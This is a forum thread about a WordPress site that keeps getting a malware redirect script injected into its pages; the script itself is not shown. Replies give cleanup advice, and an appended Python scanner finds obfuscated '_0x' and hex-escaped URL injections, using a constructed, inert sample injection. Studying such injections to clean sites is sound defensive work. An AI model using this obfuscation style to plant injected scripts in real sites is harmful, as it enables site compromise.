Malware Site Redirect code being added to the bottom of each page. No matter how much cleaning and security updates, still happens over and over


Anyone else getting this script at the bottom of each page of their site? I will remove it using the code editor, save, it'll be gone for a few days, then it'll return.

I have done a complete reinstall of all themes and plugins. Hardened the site, using WordFence plus many other countermeasures. Still happening. Anyone have any ideas? Thanks!

HERE'S THE SCRIPT:


8 Comments
  1. Unless the site is cleaned properly, and the malware entry point identified, it will keep happening. Google “how to clean malware from an infected wordpress site” – there are tons of guides on how to do this. Cleaning involves deleting everything (except your DB & /wp-content/uploads) and starting from a **fresh** install. Reinstalling won’t remove malware.

    (no need to post the script – all that matters is that your site is compromised and it needs to be cleaned)

  2. I would probably start by downloading a backup of the site, including database, and search within the whole folder using vscode or something for a unique string of that script to see if there’s any compromised plugin or anything that is adding it.

    I would also make sure I’m secure at the hosting level, change FTP passwords, make sure every account has 2FA etc. If you’re on managed hosting I would definitely involve your hosting’s customer support.

    For monitoring and troubleshooting the Stream plugin will capture an audit log of which pages have been edited by which user, so that would indicate if a user account is being compromised. The WP Crontrol plugin will give you a list of cron events currently set up which could possibly be the method being used for this, it’s worth checking.

  3. You need to scan and scrub the entire server. If you have other sites on the same server (non-isolated), those all need to be cleaned at the same time or you will keep playing whack-a-mole.

  4. Security Plugins and Scanners can only do so much. At the end of the day, I would recommend a real expert to look at your site, because it could be more than 1 place.

  5. Install something like Sucuri that will show you login attempts. See if it is a compromised password.
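
Added example (not part of the thread or any commenter's code): the search suggested in comment 2, run over an extracted backup in Python. It looks for two traits of the script in the question, `_0x`-style identifiers and hex-escaped strings that decode to `http` URLs, and also accepts the doubled backslashes a SQL dump uses; the sample backup, its file names and the `example.invalid` URL are constructed.

```python
import re
import tempfile
from pathlib import Path

# Traits of the script in the question: hex-escaped strings and _0x identifiers.
# A SQL dump stores each backslash doubled, so accept one or two.
HEX_RUN = re.compile(r"(?:\\{1,2}x[0-9a-fA-F]{2}){4,}")
OBF_IDENT = re.compile(r"\b_0x[0-9a-f]{4,6}\b")
SUFFIXES = {".php", ".js", ".html", ".htm", ".sql"}


def decode_hex(run):
    """Decode a hex-escaped run and defang it for safe reporting."""
    text = re.sub(r"\\{1,2}x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), run)
    return text.replace("http", "hxxp").replace(".", "[.]")


def scan_backup(root, min_idents=5):
    """Return (relative path, line number, ident count, decoded URLs) per hit."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUFFIXES:
            continue
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        for no, line in enumerate(lines, 1):
            idents = len(set(OBF_IDENT.findall(line)))
            urls = [u for u in map(decode_hex, HEX_RUN.findall(line)) if u.startswith("hxxp")]
            if urls or idents >= min_idents:
                hits.append((path.relative_to(root).as_posix(), no, idents, urls))
    return hits


def build_sample(root):
    """Constructed backup: one injected theme file, one injected DB row, one clean file."""
    esc = "".join("\\x%02x" % b for b in b"http://example.invalid/a")
    js = "<script>const _0x1a2b3c=['%s'];_0x1a2b3c[0];</script>" % esc
    theme = Path(root, "wp-content/themes/demo")
    theme.mkdir(parents=True)
    (theme / "footer.php").write_text("<?php wp_footer(); ?>\n" + js + "\n")
    (theme / "index.php").write_text("<?php get_header(); ?>\n")
    row = js.replace("\\", "\\\\").replace("'", "\\'")  # escaped as in a SQL dump
    Path(root, "dump.sql").write_text("INSERT INTO wp_options VALUES ('%s');\n" % row)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for hit in scan_backup(tmp):
            print(hit)
```

A hit in the SQL dump means the injection is stored in the database, which survives a reinstall of themes and plugins; a hit in a theme or plugin file points at the file being rewritten.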
